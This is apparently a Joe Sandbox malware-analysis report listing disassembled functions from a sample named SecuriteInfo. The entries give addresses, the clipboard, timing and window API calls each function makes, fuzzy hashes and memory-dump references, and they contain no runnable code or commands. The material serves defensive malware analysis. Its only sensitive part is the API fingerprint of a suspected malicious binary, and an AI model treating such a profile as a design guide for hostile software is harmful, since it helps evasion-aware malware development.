Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 050a51655c139567fa7574dc0bdec20b7789bb56bccfa818d0e7d9af9c7b0942
Instruction ID: 927671fa6e8873e40720bcfff860dfa4835a5c1fb427d0d0673797351c4d7c1e
Opcode Fuzzy Hash: 050a51655c139567fa7574dc0bdec20b7789bb56bccfa818d0e7d9af9c7b0942
Instruction Fuzzy Hash: F8917F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400378DE Relevance: 9.2, APIs: 6, Instructions: 190windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: d4c103cc6dbb118a9dee737281c8368289f756bf5630a8248a7044edcee4af2b
Instruction ID: 4798e12359d9e271c14237e760a047eeb21167eba458263e629e3c729099b6b9
Opcode Fuzzy Hash: d4c103cc6dbb118a9dee737281c8368289f756bf5630a8248a7044edcee4af2b
Instruction Fuzzy Hash: 6A917132205B4486FB6B8B27E8947EA37A1F74DBD4F580116EB59876F5DB38C880C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003839B Relevance: 9.2, APIs: 6, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f64c13a9f908a028e51b18ebd4ed0853319eeb0de48e00a636fe6786f8989f21
Instruction ID: 61330648939a4f79686b05567e87844c7932dfaa2624eb7af3e45040dfe1c113
Opcode Fuzzy Hash: f64c13a9f908a028e51b18ebd4ed0853319eeb0de48e00a636fe6786f8989f21
Instruction Fuzzy Hash: 71914D32205B4486FB6B8B27E8947DA77A1F74DBE4F540116EB9A876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035556 Relevance: 9.2, APIs: 6, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: fa35745a4d915b7886617b8b8f2d11392feb1a0ccfcdb20b73eed9ed054344e4
Instruction ID: e5812014f58731e019c9ee7f1c6629cd9901fea5420477f340f9f082ce106b6d
Opcode Fuzzy Hash: fa35745a4d915b7886617b8b8f2d11392feb1a0ccfcdb20b73eed9ed054344e4
Instruction Fuzzy Hash: 88916032205B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037758 Relevance: 9.2, APIs: 6, Instructions: 187windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 2b20c7cae8bca3efd0fe799d90746c646fa0deaadd6aa940801d9b33416e995b
Instruction ID: 3fa8b31a87e5565adf0905dcab55f2246f4db6b2bec408604ca280105fbf64b4
Opcode Fuzzy Hash: 2b20c7cae8bca3efd0fe799d90746c646fa0deaadd6aa940801d9b33416e995b
Instruction Fuzzy Hash: 29915F3220574486FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037860 Relevance: 9.2, APIs: 6, Instructions: 187windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Part of subcall function 0000000140081560: RemoveDirectoryW.KERNEL32 ref: 000000014008156B

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseDirectoryGlobalMessagePeekRemoveUnlock
String ID:
API String ID: 1863380684-0
Opcode ID: 509d3cba740121e829a0ce86cdef20337e14043b5d3af8e03be8822022b6abc5
Instruction ID: b8c3f1790a5916fed46c5c34c2b96125753e5239c5fe4c92f5a3329814769ce5
Opcode Fuzzy Hash: 509d3cba740121e829a0ce86cdef20337e14043b5d3af8e03be8822022b6abc5
Instruction Fuzzy Hash: FF916E32605B4086FB6B8B27E8847EA37A1F74DBE4F540116EB59876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003724C Relevance: 9.2, APIs: 6, Instructions: 186windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e4afd273397322c90fa9096e374a8c4fd22e67a2f77cf836b1652ea9f372fdae
Instruction ID: d51d4333bc6466b34f03d783c8c2bff1664047f6f4ebd5682177a953c9e01a2e
Opcode Fuzzy Hash: e4afd273397322c90fa9096e374a8c4fd22e67a2f77cf836b1652ea9f372fdae
Instruction Fuzzy Hash: B5916F31205B4086FB6B8B27E8947EA27A2F74DBE4F540116FB5947AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037AEA Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400807F0: CoInitialize.OLE32 ref: 000000014008081D
Part of subcall function 00000001400807F0: CoCreateInstance.OLE32 ref: 0000000140080841
Part of subcall function 00000001400807F0: GetKeyboardLayout.USER32 ref: 0000000140080931

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseCreateGlobalInitializeInstanceKeyboardLayoutMessagePeekUnlock
String ID:
API String ID: 1422310799-0
Opcode ID: 308101f22d18f94e826bce899adcc12ccd8010a2e8a29c9bcfe24b1f1cb16a7d
Instruction ID: 1d400bd56753181d91fa23a51b216ebaddc4cd4cac14e01c26c92a9fc4198a3f
Opcode Fuzzy Hash: 308101f22d18f94e826bce899adcc12ccd8010a2e8a29c9bcfe24b1f1cb16a7d
Instruction Fuzzy Hash: D1915036205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99477F5DB38C880C701

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003589A Relevance: 9.2, APIs: 6, Instructions: 184windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 3b7a8cb2c9515a72916180c313a1a33d57c613ad8a7729aa1562d9e4899ec96a
Instruction ID: d23fe9194b1ad5620ed5b926ec11e1d47ac4c8c96d028aadbe94ee7a6ffff12b
Opcode Fuzzy Hash: 3b7a8cb2c9515a72916180c313a1a33d57c613ad8a7729aa1562d9e4899ec96a
Instruction Fuzzy Hash: 7C917F32605B4086FB6B8B27A8547EA27A1F74DBD4F540116FB5A476F5CB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003687F Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 43ece1a9e8a3933a5102030c765bc4d0474b4afc7521a936d5cbd370457117ab
Instruction ID: f5d04d1fb2c22407358d1b2d7fb9343a3eddeac6ddc5893270cb4273840c77f5
Opcode Fuzzy Hash: 43ece1a9e8a3933a5102030c765bc4d0474b4afc7521a936d5cbd370457117ab
Instruction Fuzzy Hash: EB915F32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99877F5DB38C880C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140033CB9 Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9d13c5e1ea52bd57a754456badb11e2a6f2aefdeb21774800347278e81986a58
Instruction ID: e16451101d427e2d695526564ad1aa1ecf36d372c0451c50b4d90b5a8012d29b
Opcode Fuzzy Hash: 9d13c5e1ea52bd57a754456badb11e2a6f2aefdeb21774800347278e81986a58
Instruction Fuzzy Hash: CE918132205B4486FB6B8B27E8447EA77A1F74DBE4F550116EB99476F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036117 Relevance: 9.2, APIs: 6, Instructions: 182windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B2480: GetForegroundWindow.USER32 ref: 00000001400B24D8
Part of subcall function 00000001400B2480: IsWindowVisible.USER32 ref: 00000001400B24F2
Part of subcall function 00000001400B2480: IsIconic.USER32 ref: 00000001400B250B
Part of subcall function 00000001400B2480: ShowWindow.USER32 ref: 00000001400B251D

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTickWindow$ClipboardCloseForegroundGlobalIconicMessagePeekShowUnlockVisible
String ID:
API String ID: 1891409732-0
Opcode ID: 13ba0e176eff2c8a2816fe5779156a634d804cd99b8ef06833ea4aafec7956d0
Instruction ID: b0505203bde2e21c8cce81d3b0088850f4be2d77646577137417106c70cbdafd
Opcode Fuzzy Hash: 13ba0e176eff2c8a2816fe5779156a634d804cd99b8ef06833ea4aafec7956d0
Instruction Fuzzy Hash: CA914D32605B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5947AF5CB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003676B Relevance: 9.2, APIs: 6, Instructions: 182windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140049E80: GetWindowRect.USER32 ref: 0000000140049EBF
Part of subcall function 0000000140049E80: MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001400367BF), ref: 0000000140049FA3

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseGlobalMessageMovePeekRectUnlock
String ID:
API String ID: 1284534901-0
Opcode ID: 02cefdc42461796bf07c2677d7a2c160d10b9feb34cd448a763ff07ddb0cb7d6
Instruction ID: b64099fbff93db826dfc9e1528172be6f321e5e5951f2af3455f5242e006f3f0
Opcode Fuzzy Hash: 02cefdc42461796bf07c2677d7a2c160d10b9feb34cd448a763ff07ddb0cb7d6
Instruction Fuzzy Hash: 7B916D32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB9987BF5DB38C880C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037F87 Relevance: 9.2, APIs: 6, Instructions: 182windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 47a1607b006f293736b00dab3a60f12c09ce661de30d11ee3532dd6d38482a6b
Instruction ID: 04623d159412e4fc5c6a168e657707332d605080e212b0b4981d6cb80f5881aa
Opcode Fuzzy Hash: 47a1607b006f293736b00dab3a60f12c09ce661de30d11ee3532dd6d38482a6b
Instruction Fuzzy Hash: CD915F35205B4086EB6B9B27E8943EA3791F74DBE4F140116FB59876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036B07 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

